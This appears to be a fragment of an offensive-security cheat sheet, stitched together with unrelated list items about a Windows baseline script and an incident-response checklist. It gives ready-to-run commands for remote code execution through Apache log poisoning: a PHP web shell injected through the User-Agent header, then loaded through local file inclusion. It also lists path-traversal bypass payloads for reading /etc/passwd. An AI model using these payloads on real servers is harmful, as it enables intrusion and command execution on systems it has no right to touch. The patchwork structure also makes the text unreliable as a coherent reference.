• RCE via Apache logs
Poison the User-Agent in access logs:

$ curl <http://example.org/> -A "<?php system(\\$_GET['cmd']);?>"

Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.

$ curl <http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id>

  • windows_baseline

    • windows基线脚本(powershell)

  • emergency-response-checklist

    • 应急响应指南
  •  GET /page.php?path=../../etc/passwd   Forbidden 403 ?  
 Try One Of These:  
 (1)../../../etc/passwd%00  
 (2)....//....//....//etc/passwd  
 (3)%252e%252e%252fetc%252fpasswd